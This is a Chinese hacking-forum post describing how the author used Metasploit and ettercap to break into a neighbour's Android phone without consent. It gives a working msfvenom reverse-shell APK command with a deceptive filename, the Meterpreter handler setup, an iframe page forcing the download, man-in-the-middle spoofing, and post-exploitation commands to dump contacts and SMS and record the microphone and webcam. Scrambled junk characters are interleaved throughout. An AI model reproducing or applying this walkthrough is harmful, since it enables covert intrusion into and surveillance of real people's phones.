找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1874|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

o ^$ b& P2 P3 X# p: } 五、msf+ettercap入侵邻居安卓手机 0 y; X$ A+ l" v; V

$ V! _/ Z9 s/ I1 Y

2 h- Y, f( D1 Y# ?1 K( }6 U 首先启动msf $ Y" m1 {2 G' B- @3 c Q: F8 `

, h: |# H! q9 T1 s

+ {% C% I. {7 h0 z0 ~; h7 v8 m! f 先用kali生成一个安卓木马,如下命令: ( h+ Z# j3 v0 l9 ?

3 e5 c [; a: M. h( F( Z5 b

+ O9 w& Z+ z0 Q: [4 W( i" I5 F3 P' ` Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk " V2 \8 h. M% q4 ~ B* G# A

- T b/ x, o2 c! r7 _

; D6 p9 u% ]9 [" B% X6 y& e2 f7 u 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 0 g1 L6 X' H: X

: Y1 ~/ e2 X$ E9 }# Z

p$ M) z& _2 W5 Q# V1 U4 Q" G6 P 然后进入msf # [$ h0 z; x% X2 }/ R

' j( l, |( a' B) q1 |& F6 P

1 K# x1 c5 [5 ^2 }! R( M, E. m use exploit/multi/handler ' X7 J9 n2 R4 P" G$ O! L

& V3 ~! }3 }* z2 V, P8 m7 ^& x: z

: I' i, z: W7 c6 W, ~ set payload android/meterpreter/reverse_tcp ' P2 P5 E- p2 G! w! X( }

: i9 G: @" ?2 D' y* N' n

# E9 C# P5 b* d o set LHOST 192.168.0.109 //ipkailiip 9 v, J3 @; j8 w

7 C {/ O+ _" H0 B1 J; F

2 P6 b; f- ~. d& K set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : W6 l6 m, @9 H& C/ _* t7 x ?

2 v" D4 V! l% @/ N2 S) z

) w! ~9 S. S5 ~- G Exploit ( Z5 h8 G& B5 a# [) e9 h

7 o' U3 [( X- ?) N2 W; Q) @

, ~' b/ \& D% d0 b+ U   ; Z Y W0 L+ w; ?! ?

4 F+ C6 R* T+ H

* t6 J9 j5 B" l" \ 下面我们开启ettercap -G 2 m. l& ]4 D) u5 l3 x

" t* ]- }7 ^' Q/ c T

( j/ B! p: W0 a1 e) D 我物理IP + l0 Q. {9 _+ A0 R

6 j$ I3 O$ K' l% Z4 Z9 c" h

$ g3 X" {: z: l1 `' z9 E) R   * I% ]7 [, Z" |2 I. e9 {% w+ w

. p0 D# n6 Q. {, v; _8 E3 }4 ]

8 p4 }2 O, m7 g, V7 R( H0 l) E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, # F6 y# E& _, E7 n* O

7 t: e% j: B' Z/ v

, ?' T* p* D; B% Z4 C# x2 T3 g 下面我们来设置一下 8 K7 y6 F2 F2 E$ ~

5 G% S3 I2 a; U- ^1 W

+ n! U1 f7 A6 h; G$ y) @   6 t M) s! T, F5 ~8 J

: W! E; h/ y9 x( i8 L4 }$ ]. i- W1 {

$ C+ B' {+ k6 m/ T- T$ d+ p 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ( D# J" @9 G: x6 q

# K) ]0 f1 Y3 E/ w, a

. B B" Y" H' y+ Q   5 V# d ` m4 W9 I% x, A

* L5 v: Y A; T7 v2 C

$ }$ a' Z5 M. `: t0 a   8 |0 R. U3 p0 s2 i" g

! ?5 S6 m; {4 c: S) O! A+ W* S d: h# Z

% y, ?1 U; A o0 X3 w' g3 m   $ o% i4 h( I, K2 a. J5 g* b

2 X2 X) `4 |& f% R2 z$ Z

( P7 N9 L z" }" |8 G   : W+ e% n* v5 a$ j" a# }+ W

& X/ k* s" M7 ~

& T5 ?; n5 C# u6 w   2 p1 N& E" A# \: L+ M& _

8 b7 n$ D: D1 ?) L$ u

$ e0 K/ L) V* E   ) {1 X6 U f# k, d. j5 X+ A& X4 x

( T/ x. N' J; l5 U' ~! B

( t, t, D/ V! k1 n   8 ?( _9 Y+ p0 g: S1 [2 z7 p

6 b5 `3 V/ I2 g( ?

+ f: y( r) Z* c4 `+ c6 ]   + A; Q1 q/ u$ |. ^9 \/ }& u

7 y! c- r: x8 Y1 o% o7 F

2 D* f$ q8 ]1 z4 h" {) E0 v7 Y   3 l: K: \# ?5 L7 N

0 O8 A8 R" }% p8 I

. K1 a5 C8 B- @- a3 ~   # q# c$ {9 Y0 F

9 z" N3 z& E: r& n) p! v

* |, B4 |+ X8 K8 e$ ?5 T& \   5 R" J1 i; A7 [" R# C5 c

$ n! _4 _7 x8 f1 j1 C/ ~

: d8 k( w V0 t   % l. x* @4 Q. v. ~# L

) y+ G' a# f! C4 r6 J" z

; W |/ C5 ]9 c) c) x n. @# l% B   8 G% e" }5 p/ P0 H8 |; X( O5 o$ b

. J) G8 k" @. B

5 X) @- Z4 ~: s. g L i 下面我们开始攻击 1 M3 H4 |# C; f. H' p

3 t+ a1 Q2 R1 d( a1 A( g; [

% `) s7 B) ~ U   o0 Q5 f/ E |9 V9 }* v1 @0 h, |

. h) t' V: C$ t' W% l" M8 r4 I

7 [; i" Y) |: V   ( p- J! O+ c% p* m) p- l

; J! [3 r7 `! E

4 z* W4 t" k) @1 ]7 E   7 ]$ F- {# l; T# o. I

/ \# \" h/ Z) u4 X

5 C/ c3 Q, i9 E M2 e5 V   / h3 f2 I; [; P/ w# d( g6 Y" o# B1 _

; j6 c% p1 z" A+ ?

/ f1 t0 H x/ l2 u$ |7 p3 E- E   ( g# D- \' f) U

7 g$ U# {' O$ q/ s

2 w0 K. U$ E0 @. j! ~4 W 大概过了5分钟多,发现反弹成功了 0 |2 X! ?+ S0 _- Y0 t0 J

5 Z d# a3 @9 z* i' D9 I. C

6 S; w; ]3 \% _0 H# V* X( w   / a, C; [8 u. o5 Q

; R4 \% U; P' h$ z9 @5 f8 ~

5 G5 I6 l. P* @2 n2 E1 D   8 e. B3 v! W9 Z0 @3 `0 U |

1 f/ u: ]& M( v$ c7 Y

6 u+ u0 X% v& w- Z   0 ~4 a: A" p: p7 j/ j3 M

6 P+ J# ~& ]1 g+ s; \( p8 H

2 ^7 q/ `% \3 H& }# R, h$ ?" V   ; Q" P O! w, @7 }/ c3 v

$ j/ ]. y* O# O

: H( ~9 e. {9 i9 G& P5 T   , z, ~6 N9 Q! T3 K" ]4 F! S6 p! Z

3 v, o% T: l& l6 B7 Z# b

% e! t S- o, n! e) Z8 a+ N   % z; ?2 b- m+ t0 [& z; N6 e8 I' q

" v2 @; f8 u" E- ?5 a

5 W( B- { [* K: a. a, r- Y# A7 ?: Y   , E- c1 q( t' v9 @

- a; F/ d$ t4 g6 h+ s4 o: c# e C

* ~% Q. @, A+ v( s) v. ?4 U 执行命令 . T, b" u$ Q! Q8 V! R; r

8 C3 S% H* W1 U" m s* ?

0 H9 F R) ^1 ^6 I+ H" a   1 l% y$ o* W/ k7 L2 d/ o! }, Y3 {

/ u$ y8 D+ q8 D( g7 d

: \1 A. P, a" m& }: _8 A5 m dump_contacts    --》这个是导出电话 6 U* H$ F) n, }: G! F

& @6 P1 I& l: f- b1 V& g

: W" q! a9 O* l5 @ dump_sms --》这个是导出信息 3 t0 W. _5 @# \' P0 H0 E, J: S

% Z# e: o1 `2 X! V3 ?* |# g: n

) f' K! u( M- u record_mic     Record audio from the default microphone for X seconds ) o. E" w& H6 O+ Q( ?

6 s7 U; m z$ D- u2 b) B% f4 @2 ~

1 D5 i" `: U) X) Y- G; C- M* [     webcam_chat    Start a video chat 9 p3 Z! {. a+ ^3 A) R/ O! P

* E$ `% j$ k- P* A6 U# |$ k

A4 Y3 S, g* E* [8 _& {1 K' P; n     webcam_list    List webcams 7 i% _- z# i; [8 n m, t# O4 d

- R q8 A+ S" D) [* O$ r

" M( A; Y; q0 a- i+ r" b     webcam_snap    Take a snapshot from the specified webcam 4 w& `9 B% a# D9 A% o( Q3 [4 `

! O: |" ?) \9 g9 C' y

# p0 h& R/ B) S8 e$ u3 B/ i webcam_stream  lay a video stream from the specified webcam - x T% R* f8 q0 c' p+ x- n

9 R5 _# o3 r9 \! q# d

' E% `2 D* {8 ?1 l" _   / L" {. J C( t0 b7 {

% j: g" Q7 o) a; T8 c6 y

{7 U A# I+ y; V, `* c   1 [' g+ |1 W V0 G

! R% E _8 X9 a) S" |# Q* N# S6 f

: p7 d) V0 K3 |& V$ G+ u. t 我们打开看一下电话薄, : J/ H0 E/ @0 F. t5 O& U

5 T; n) @! _: R$ |" Z

6 ^" i5 ~1 m7 U" Y   1 s$ A5 w9 p5 Q9 F" r( R5 n4 A; i

% z0 a1 m6 r) R- n3 p

t" E( m* f9 g( _   2 P# _6 o N* B

$ }% [% c, Q% F; D& U6 Q

+ d, v/ o9 z C   ; O% w: K! @7 x3 {

2 _& m4 k* B2 y# L

* g5 a; S8 J1 S% \9 `3 s! U' p5 u   2 f, T) F; h& O' _" v

6 `4 ]* I9 Y; r2 P

s' F) N/ p: s. q$ p$ o/ e& `   : v' f" a! F2 l' W' o* ]. |

! ?4 e) S- d! m8 T

0 M. N, E: u$ H* G3 d   * H5 p3 S: T& F

# b$ f7 a9 @4 m% T

8 V/ Q: }9 p$ f' y# t% { 我们同时欺骗成DroidJack木马,使用方法如图: # Y" z/ l2 b+ Z/ o

1 b7 N8 b& D4 d. s

, z* c9 h: n5 i   5 R. H0 q9 r6 }8 e% ]0 l2 {( O% d

2 M1 A) C0 v' K) t6 V

* n3 H: T, q- i7 Z9 ^1 A" t1 a2 o   9 g+ m) [; |2 E

# c6 A( A7 @2 r3 |

$ J/ U; \+ P/ _& \9 L6 N   * P0 k) R% z/ ?8 W! P

% v4 R/ ]3 v. n$ P' z, n; C

2 J3 S/ p: L4 k6 r7 Z& G& e 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * n0 }+ o! [. h: V

8 K) B9 c3 x2 o6 y

& K1 `' n" a: n" {8 d3 I   : L9 C3 Z; n8 L: G: H, T% h

4 H, {! {2 u- Z) I/ E; d( t

. X; ^* ?- q q* n l' N5 U" @! v   ; O0 y8 e; r& y

+ c. J; D! |$ K7 a f6 Q

4 A/ M' p( E! e3 R, ~1 e   & R- n6 ~) Z4 Q& I1 l' g& P

5 E$ j7 Q7 y6 \# ]! V) j

, ]& |" y/ i( [6 K7 X( t5 D3 ] ( ~- Q, p- s- p. K8 i+ _/ f

, W. V# `* g* {( U+ y, R

: v; F& T* ?/ Z& }
3 j7 x$ t3 d; O4 a P

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表